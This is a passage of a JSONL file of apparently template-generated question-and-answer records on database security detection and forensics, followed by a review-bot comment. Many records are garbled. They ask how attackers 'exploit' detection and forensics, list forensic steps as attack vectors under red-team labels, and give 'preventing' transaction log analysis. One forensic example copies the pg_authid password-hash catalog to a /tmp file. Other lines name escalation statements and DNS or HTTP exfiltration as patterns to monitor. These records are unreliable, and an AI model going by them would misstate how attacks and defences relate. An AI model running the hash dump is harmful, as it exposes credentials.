"2025-12-17T19:35:42.196579Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196634Z", "updated_at": "2025-12-17T19:35:42.196634Z"} +{"id": "trtp-90141967a251", "instruction": "How can Privilege Escalation Detection lead to database security incidents?", "output": "Privilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. 
Prevention limits breach impact.\n\nCommon attack vectors include:\n- Direct GRANT abuse\n- Role membership manipulation\n- SECURITY DEFINER exploitation\n- Exploiting vulnerable procedures", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196655Z", "updated_at": "2025-12-17T19:35:42.196655Z"} +{"id": "trtp-684b93aa9340", "instruction": "How can adversaries exploit Privilege Escalation Detection?", "output": "Attack techniques involving Privilege Escalation Detection:\n\n- Direct GRANT abuse\n- Role membership manipulation\n- SECURITY DEFINER exploitation\n- Exploiting vulnerable procedures\n\nDefenders can detect these attacks by:\n- GRANT/REVOKE statement monitoring\n- Role membership changes\n- Superuser operations", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196675Z", "updated_at": "2025-12-17T19:35:42.196675Z"} +{"id": "trtp-7cdb4e3e18ca", "instruction": "What indicators reveal malicious activity involving Privilege Escalation Detection?", "output": "Methods for detecting Privilege Escalation Detection attacks or anomalies:\n\n- GRANT/REVOKE statement monitoring\n- Role membership changes\n- Superuser operations\n- DDL statement auditing\n- Privilege 
change alerts", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196687Z", "updated_at": "2025-12-17T19:35:42.196687Z"} +{"id": "trtp-628544687991", "instruction": "How do you defend against Privilege Escalation Detection attacks?", "output": "Security controls and preventive measures for Privilege Escalation Detection:\n\n- Audit all privilege changes\n- Alert on privilege escalation\n- Regular privilege reviews\n- Restrict GRANT capability\n- Monitor high-privilege operations\n\nPrivilege escalation transforms limited access into full database control. Detecting escalation attempts reveals active attacks and compromised accounts. 
Prevention limits breach impact.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196700Z", "updated_at": "2025-12-17T19:35:42.196700Z"} +{"id": "trtp-9cf1bc551b09", "instruction": "Provide a code example for Privilege Escalation Detection.", "output": "Example of Privilege Escalation Detection:\n\n```sql\n-- PostgreSQL: audit privilege changes\nSELECT * FROM pg_auth_members;\nSELECT * FROM information_schema.role_table_grants;\n\n-- SQL Server: track permission changes\nSELECT * FROM sys.fn_builtin_permissions(DEFAULT)\nWHERE permission_name LIKE '%GRANT%';\n\n-- Monitor for:\n-- GRANT ... WITH GRANT OPTION\n-- ALTER USER ... SUPERUSER\n-- sp_addsrvrolemember\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-privilege-escalation-detection", "license": "original", "retrieved_at": "2025-12-17T19:35:42.196579Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.196717Z", "updated_at": "2025-12-17T19:35:42.196717Z"} +{"id": "trtp-9f9c38d3c587", "instruction": "How does Data Exfiltration Indicators work and what are its security implications?", "output": "Data exfiltration from databases leaves indicators including large query results, bulk exports, unusual SELECT patterns, and network traffic anomalies. 
Detecting exfiltration requires monitoring both database and network layers.\n\nSecurity Relevance: Data exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. Large data access should trigger alerts.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.198953Z", "updated_at": "2025-12-17T19:35:42.198953Z"} +{"id": "trtp-dc10fca10d2e", "instruction": "Describe the technical aspects of Data Exfiltration Indicators.", "output": "Data Exfiltration Indicators consists of the following key components:\n\n- Query result size monitoring\n- Bulk export detection\n- Network data volume analysis\n- SELECT * patterns\n- Scheduled job data extraction", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199002Z", "updated_at": "2025-12-17T19:35:42.199002Z"} +{"id": "trtp-e68fe6c895af", "instruction": "Why is Data Exfiltration Indicators important for database security?", "output": "Data exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. 
Large data access should trigger alerts.\n\nCommon attack vectors include:\n- Bulk SELECT for data theft\n- OUT-OF-BAND exfiltration via HTTP\n- DNS exfiltration of data\n- Export to file and retrieve", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199048Z", "updated_at": "2025-12-17T19:35:42.199048Z"} +{"id": "trtp-0376ba9e9844", "instruction": "What are common attack techniques involving Data Exfiltration Indicators?", "output": "Attack techniques involving Data Exfiltration Indicators:\n\n- Bulk SELECT for data theft\n- OUT-OF-BAND exfiltration via HTTP\n- DNS exfiltration of data\n- Export to file and retrieve\n\nDefenders can detect these attacks by:\n- Large query result sets\n- Bulk data access patterns\n- Export operations (INTO OUTFILE)", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199087Z", "updated_at": "2025-12-17T19:35:42.199087Z"} +{"id": "trtp-c2878cc5b940", "instruction": "What log entries indicate Data Exfiltration Indicators attacks?", "output": "Methods for detecting Data Exfiltration Indicators attacks or anomalies:\n\n- Large query result sets\n- Bulk data access patterns\n- Export operations (INTO OUTFILE)\n- Unusual network traffic from 
DB\n- pg_dump/mysqldump execution", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199102Z", "updated_at": "2025-12-17T19:35:42.199102Z"} +{"id": "trtp-bf24a407a6b5", "instruction": "How do you defend against Data Exfiltration Indicators attacks?", "output": "Security controls and preventive measures for Data Exfiltration Indicators:\n\n- Monitor query result sizes\n- Alert on bulk data access\n- Track export operations\n- Network traffic analysis\n- DLP integration\n\nData exfiltration is the ultimate goal of many database attacks. Detecting exfiltration during or after occurrence is critical for breach response. 
Large data access should trigger alerts.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199115Z", "updated_at": "2025-12-17T19:35:42.199115Z"} +{"id": "trtp-c62d45cd13e6", "instruction": "What is the syntax for Data Exfiltration Indicators?", "output": "Example of Data Exfiltration Indicators:\n\n```sql\n-- Monitor large query results:\n-- PostgreSQL pg_stat_statements:\nSELECT query, rows, calls \nFROM pg_stat_statements \nWHERE rows > 10000 \nORDER BY rows DESC;\n\n-- Alert indicators:\n-- SELECT * FROM large_table\n-- Multiple UNION SELECT queries\n-- INTO OUTFILE operations\n-- pg_dump/mysqldump execution\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-data-exfiltration-indicators", "license": "original", "retrieved_at": "2025-12-17T19:35:42.198901Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.199133Z", "updated_at": "2025-12-17T19:35:42.199133Z"} +{"id": "trtp-fa5082ae2e71", "instruction": "How does Database Forensics Fundamentals work and what are its security implications?", "output": "Database forensics involves collecting and analyzing evidence from database systems after security incidents. Key sources include logs, transaction history, file system artifacts, and memory analysis.\n\nSecurity Relevance: Database forensics determines breach scope, attack methods, and data accessed. 
Proper evidence handling supports legal proceedings. Understanding forensic artifacts enables better detection.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201557Z", "updated_at": "2025-12-17T19:35:42.201557Z"} +{"id": "trtp-a906595a31fa", "instruction": "What are the key components of Database Forensics Fundamentals?", "output": "Database Forensics Fundamentals consists of the following key components:\n\n- Log collection and preservation\n- Transaction log analysis\n- Query history reconstruction\n- Timeline creation\n- Evidence preservation", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201577Z", "updated_at": "2025-12-17T19:35:42.201577Z"} +{"id": "trtp-be1d4ba85fb9", "instruction": "From a security perspective, why should defenders understand Database Forensics Fundamentals?", "output": "Database forensics determines breach scope, attack methods, and data accessed. Proper evidence handling supports legal proceedings. 
Understanding forensic artifacts enables better detection.\n\nCommon attack vectors include:\n- Reconstructing attacker actions\n- Identifying data accessed\n- Determining initial compromise\n- Tracking lateral movement", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201599Z", "updated_at": "2025-12-17T19:35:42.201599Z"} +{"id": "trtp-07118c0b0c33", "instruction": "How can adversaries exploit Database Forensics Fundamentals?", "output": "Attack techniques involving Database Forensics Fundamentals:\n\n- Reconstructing attacker actions\n- Identifying data accessed\n- Determining initial compromise\n- Tracking lateral movement\n\nDefenders can detect these attacks by:\n- Forensic artifact locations\n- Log correlation techniques\n- Timeline reconstruction", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201613Z", "updated_at": "2025-12-17T19:35:42.201613Z"} +{"id": "trtp-30f0997f1faf", "instruction": "What indicators reveal malicious activity involving Database Forensics Fundamentals?", "output": "Methods for detecting Database Forensics Fundamentals attacks or anomalies:\n\n- Forensic artifact locations\n- Log correlation techniques\n- Timeline 
reconstruction\n- Evidence integrity verification\n- Chain of custody maintenance", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201625Z", "updated_at": "2025-12-17T19:35:42.201625Z"} +{"id": "trtp-b3ec57f4c6d2", "instruction": "What preventive measures address Database Forensics Fundamentals vulnerabilities?", "output": "Security controls and preventive measures for Database Forensics Fundamentals:\n\n- Enable comprehensive logging\n- Preserve logs externally\n- Document collection procedures\n- Maintain evidence integrity\n- Regular forensic readiness review\n\nDatabase forensics determines breach scope, attack methods, and data accessed. Proper evidence handling supports legal proceedings. 
Understanding forensic artifacts enables better detection.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201637Z", "updated_at": "2025-12-17T19:35:42.201637Z"} +{"id": "trtp-bd7d4e7b6397", "instruction": "What does Database Forensics Fundamentals look like in SQL?", "output": "Example of Database Forensics Fundamentals:\n\n```sql\n-- Collect forensic data:\n-- PostgreSQL:\nSELECT * FROM pg_stat_activity; -- Active sessions\nSELECT * FROM pg_stat_statements; -- Query history\n\\copy pg_catalog.pg_authid TO '/tmp/authid_backup.csv';\n\n-- SQL Server:\nSELECT * FROM sys.dm_exec_sessions;\nSELECT * FROM sys.dm_exec_query_stats;\nSELECT * FROM fn_dblog(NULL, NULL); -- Transaction log\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-database-forensics-fundamentals", "license": "original", "retrieved_at": "2025-12-17T19:35:42.201526Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.201647Z", "updated_at": "2025-12-17T19:35:42.201647Z"} +{"id": "trtp-cc6e9c7f4928", "instruction": "Describe Transaction Log Analysis and its role in database security.", "output": "Transaction logs record all database modifications and can be analyzed to reconstruct attacker actions. 
Understanding transaction log structure enables detailed forensic analysis of database compromises.\n\nSecurity Relevance: Transaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. Log analysis is essential for incident response.", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "explain_concept_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203773Z", "updated_at": "2025-12-17T19:35:42.203773Z"} +{"id": "trtp-fee10b4b9389", "instruction": "What elements make up Transaction Log Analysis?", "output": "Transaction Log Analysis consists of the following key components:\n\n- Log structure and contents\n- Log file locations\n- Log parsing tools\n- Change reconstruction\n- Point-in-time analysis", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "components_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203793Z", "updated_at": "2025-12-17T19:35:42.203793Z"} +{"id": "trtp-1853d03456f9", "instruction": "How can Transaction Log Analysis lead to database security incidents?", "output": "Transaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. 
Log analysis is essential for incident response.\n\nCommon attack vectors include:\n- Reconstructing data modifications\n- Identifying deleted records\n- Tracking privilege changes\n- Correlating with other evidence", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "security_relevance_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203809Z", "updated_at": "2025-12-17T19:35:42.203809Z"} +{"id": "trtp-110d0ba1ad7e", "instruction": "What threats are associated with Transaction Log Analysis?", "output": "Attack techniques involving Transaction Log Analysis:\n\n- Reconstructing data modifications\n- Identifying deleted records\n- Tracking privilege changes\n- Correlating with other evidence\n\nDefenders can detect these attacks by:\n- Unusual modification patterns\n- Mass DELETE operations\n- Schema changes", "category": "attack_techniques", "team": "red", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "attacks_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203835Z", "updated_at": "2025-12-17T19:35:42.203835Z"} +{"id": "trtp-5206925f7f25", "instruction": "What indicators reveal malicious activity involving Transaction Log Analysis?", "output": "Methods for detecting Transaction Log Analysis attacks or anomalies:\n\n- Unusual modification patterns\n- Mass DELETE operations\n- Schema changes\n- Privilege modifications\n- Off-hours activity", 
"category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "detection_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203846Z", "updated_at": "2025-12-17T19:35:42.203846Z"} +{"id": "trtp-38f99fe0cfb0", "instruction": "What are best practices for preventing Transaction Log Analysis?", "output": "Security controls and preventive measures for Transaction Log Analysis:\n\n- Enable transaction logging\n- Archive logs for retention\n- Understand log structure\n- Tools for log analysis\n- Regular log review\n\nTransaction logs provide detailed evidence of database modifications. They can reveal exactly what data was accessed, modified, or deleted. Log analysis is essential for incident response.", "category": "detection", "team": "blue", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "prevention_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203858Z", "updated_at": "2025-12-17T19:35:42.203858Z"} +{"id": "trtp-2744af3fe96b", "instruction": "Show an example of Transaction Log Analysis.", "output": "Example of Transaction Log Analysis:\n\n```sql\n-- SQL Server transaction log analysis:\nSELECT [Current LSN], Operation, Context, [Transaction ID],\n [Begin Time], [Transaction Name], [Description]\nFROM fn_dblog(NULL, NULL)\nWHERE Operation IN ('LOP_INSERT_ROWS', 'LOP_DELETE_ROWS', 'LOP_MODIFY_ROW');\n\n-- PostgreSQL WAL analysis:\npg_waldump 
/var/lib/postgresql/14/main/pg_wal/000000010000000000000001\n```", "category": "detection", "team": "foundation", "phase": "3c", "provenance": {"source_type": "documentation", "source_id": "database-security-detection-transaction-log-analysis", "license": "original", "retrieved_at": "2025-12-17T19:35:42.203741Z", "transform_template": "syntax_v1", "transform_version": "1.0.0"}, "quality": {"auto_score": null, "human_reviewed": false, "human_decision": null, "flags": []}, "created_at": "2025-12-17T19:35:42.203869Z", "updated_at": "2025-12-17T19:35:42.203869Z"}
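Review bot: The template-generated records for the transaction-log-analysis topic mislabel a defensive forensic technique as an attack, and the labels should be corrected before this data is used for training. The `security_relevance_v1` record asks "How can Transaction Log Analysis lead to database security incidents?" and lists forensic steps ("Reconstructing data modifications", "Identifying deleted records") under "Common attack vectors include"; the `attacks_v1` record carries `"category": "attack_techniques", "team": "red"` for the same content, and the `prevention_v1` record asks for "best practices for preventing Transaction Log Analysis" while listing "Enable transaction logging" and "Tools for log analysis", which are enablers of the technique, not controls against it. The instruction wording and the `category`/`team` fields for these three records should be regenerated from a template that treats the source topic as a detection/forensics procedure (consistent with the `explain_concept_v1` and `detection_v1` records, which already use `"category": "detection"`), or the transform should skip the attack/prevention templates for source ids under `database-security-detection-*`. Two smaller points on the `syntax_v1` example: the `pg_waldump` invocation is an operating-system command embedded in a block fenced as `sql`, so it should either be moved to its own `bash` fence or given a comment marking it as shell, and the hard-coded `/var/lib/postgresql/14/main/pg_wal/...` path should be noted as distribution- and version-specific. Finally, every record ships with `"auto_score": null` and `"human_reviewed": false`; given the labeling problems above, these rows should not be committed with `flags: []` until a reviewer has marked them.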
